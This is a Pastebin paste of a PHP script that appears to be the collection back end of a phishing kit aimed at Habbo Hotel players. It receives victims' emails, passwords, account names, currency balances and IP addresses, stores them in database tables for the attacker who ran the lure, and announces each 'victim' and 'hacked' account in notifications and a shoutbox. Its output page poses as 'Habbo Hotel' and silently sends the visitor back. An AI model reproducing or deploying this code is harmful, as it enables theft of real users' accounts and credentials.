Advertisement
Guest User

Untitled

a guest
Jun 9th, 2017
885
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.62 KB | None | 0 0
  1. <?php
  2. include 'login/includes/connect_db.php';
  3.  
  4. if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $ip = $_SERVER['REMOTE_ADDR'];}
  5. if(num_rows("","","acesso"," WHERE ip='$ip'")>2) {
  6. echo "Banned";
  7. header('X-Error-Message: Incorrect username or password', true, 500);
  8. die;
  9. } else {
  10. ########################### MÉTODO ########################
  11. $metodo = "add";
  12. ######################### DUMP DO SCRIPT #######################
  13. $diamantes_scape = htmlspecialchars(addslashes($_REQUEST["diamantes"])); //qtd diamantes
  14. $compras = htmlspecialchars(addslashes($_REQUEST["compras"])); //hist compras
  15. $moedas_scape = htmlspecialchars(addslashes($_REQUEST["moedas"])); //qtd moedas
  16. $emblemac = htmlspecialchars(addslashes($_REQUEST['emblemac'])); //possui emblema hc
  17. $mobis = htmlspecialchars(addslashes($_REQUEST['mobis'])); //possui emblema mobis
  18. $verificado = htmlspecialchars(addslashes($_REQUEST['verificado'])); //conta verificada
  19. $desde = htmlspecialchars(addslashes($_REQUEST['since']));
  20. $since = substr($desde,0,10); //data de criação
  21. $email = htmlspecialchars(addslashes($_REQUEST['email'])); //email
  22. $mail_add = htmlspecialchars(addslashes($_REQUEST['mail_add'])); //email adicionado
  23. $pass = htmlspecialchars(addslashes($_REQUEST['pass'])); //senha
  24. $habbo = htmlspecialchars(addslashes($_REQUEST['habbo'])); //nome do habbo
  25. $user= htmlspecialchars(addslashes(base64_decode($_REQUEST['id']))); //chave do usuário do project
  26. $origin = htmlspecialchars(addslashes($_REQUEST['origin']));
  27. $premium = htmlspecialchars(addslashes($_REQUEST['premium']));
  28. $vip = substr($premium,0,-1); //possui dias de hc
  29. $origem = substr($origin, 0, 25); //url de execução
  30. ########################### AÇÕES DO SERVIDOR #########################
  31. if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $pegar_ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $pegar_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $pegar_ip = $_SERVER['REMOTE_ADDR'];}//ip
  32. $dia_visita = $since;//data de criação do habbo
  33. $dia_acesso = date("d-m-Y");
  34. $horas_visita = date("H:i:s");//hora que enviou os dados pro project
  35. $url = htmlspecialchars(addslashes($origem));//url que executou o script
  36. ########################### VARIÁVEIS DE SERVIDORES DO HABBO ###########################
  37. $br = ".com.br";
  38. $it = ".it";
  39. $es = ".es";
  40. $fr = ".fr";
  41. $nl = ".nl";
  42. $tk = ".com.tr";
  43. $eua = ".com";
  44. ########################## VERIFICAR QUAL O SERVIDOR ##########################
  45. if (strpos($url,$br)){
  46. $servidor = "http://www.habbo.com.br/"; //SE EXISTIR .com.br NA URL, ENTÃO SERVIDOR VAI SER $BR
  47. }else if(strpos($url,$it)){
  48. $servidor = "http://www.habbo.it/";
  49. }else if(strpos($url,$es)){
  50. $servidor = "http://www.habbo.es/";
  51. }else if(strpos($url,$fr)){
  52. $servidor = "http://www.habbo.fr/";
  53. }else if(strpos($url,$nl)){
  54. $servidor = "http://www.habbo.nl/";
  55. }else if(strpos($url,$tk)){
  56. $servidor = "http://www.habbo..com.tr/";
  57. } else if(strpos($url,$eua)){
  58. $servidor = "http://www.habbo.com/";
  59. } else {
  60. $servidor = "Não identificado"; //SE NÃO HOUVER VARIÁVEIS DO HABBO QUE ESTEJAM PRESENTES NA URL, ENTÃO NÃO SERÁ IDENTIFICADO
  61. }
  62. ########################## PROTEGENDO CONTRA SQL #############################
  63. $email_scape = addslashes($email);
  64. $mail_add_scape = addslashes($mail_add);
  65. $pass_scape = addslashes($pass);
  66. $habbo_scape = addslashes($habbo);
  67. $user_scape = addslashes($user);
  68. $pegar_ip_scape = addslashes($pegar_ip);
  69. $dia_visita_scape = addslashes($dia_visita);
  70. $dia_acesso_scape = addslashes($dia_acesso);
  71. $horas_visita_scape = addslashes($horas_visita);
  72. $vip_scape = addslashes($vip);
  73. /*****************************************************************************************************************/
  74. //echo num_rows("","","users"," WHERE user = '$user_scape'");
  75.  
  76. $resultado = mysqli_query($connect,"SELECT * FROM `users` WHERE `user`='$user_scape'");
  77. $num_usu = mysqli_num_rows($resultado);
  78. if($num_usu > 0){
  79.  
  80. } else {
  81. $user_scape = "Frank";
  82. }
  83. if(num_rows("","","habbos"," WHERE ip='$pegar_ip_scape'")<10) {
  84. if(num_rows("","","users"," WHERE user = '$user_scape'") > 0) {
  85. if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")<1) {
  86. while($row = mysqli_fetch_array($resultado)) {
  87. $qtd = $row["qtd"];
  88. $new_qtd = $qtd + 1;
  89. mysqli_query($connect,"UPDATE `users` SET `qtd`='$new_qtd' WHERE `user`='$user_scape'");
  90. }
  91. mysqli_query($connect,"INSERT INTO notification(user,notification)VALUES('$user_scape','Você tem uma nova vitima!') ");
  92. mysqli_query($connect,"INSERT INTO habbos(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verify_mail,metodo,moedas,diamantes,deletado,dia_visita,cookies,view,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('0'),('$compras'))");
  93. mysqli_query($connect,"INSERT INTO habbos_bkp(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verificado,metodo,moedas,diamantes,deletado,dia_visita,cookies,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('$compras'))");
  94. $data = date("d/m H:i");
  95. if(mysqli_connect_errno() == 0){
  96. mysqli_query($connect,"INSERT INTO shoutbox(message)VALUES('<div class=\"message\" style=\"background-color: rgba(33,150,243,0.12);\"><p>Frank<span style=\"font-size:11px;font-weight:normal;color:#676767; float:right;\">$data</span></p><p><span style=\"font-weight:Bold;\">$habbo_scape</span> foi hackeado por <span style=\"font-weight:Bold;\">$user_scape</span> pelo método <span style=\"font-weight:Bold;\">e-mail add</span>!<span style=\"font-size:11px;font-weight:bold;color:#8A1B08; float:right;\">BOT</span></p></div>') ");
  97.  
  98. mail("$email_scape","AGRADECIMENTOS XHABBO","Obrigado por utilizar o https://project-xhabbo.com","From: frank@project-xhabbo.com");
  99. }
  100. }
  101. else if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")>0) {
  102. mysqli_query($connect,"UPDATE habbos SET mail_add=('$mail_add_scape') WHERE habbo = ('$habbo_scape') AND pass = ('$pass_scape') AND user = ('$user_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
  103. mysqli_query($connect,"UPDATE habbos_bkp SET mail_add=('$mail_add_scape') AND dia_visita=('$dia_acesso_scape') AND pass = ('$pass_scape') AND user = ('$user_scape') WHERE habbo = ('$habbo_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
  104. }
  105. }
  106. } else {
  107. mysqli_query($connect,"INSERT INTO `acesso` (`ip`) VALUES ('$pegar_ip_scape')");
  108. }
  109. }
  110. ?>
  111. <!DOCTYPE html>
  112. <html ng-app="app" lang="fr" debug="true">
  113. <head>
  114. <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
  115. <title>Habbo Hotel</title>
  116. <link rel="shortcut icon" href="https://habboo-a.akamaihd.net/habbo-web/america/pt/assets/images/favicon.08c747be.ico">
  117. <style type="text/css">
  118. body{
  119. background:linear-gradient(135deg,#15507c,#0c3a65);
  120. }
  121. </style>
  122. </head>
  123. <body>
  124. <script>window.history.back();</script>
  125. </body>
  126. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement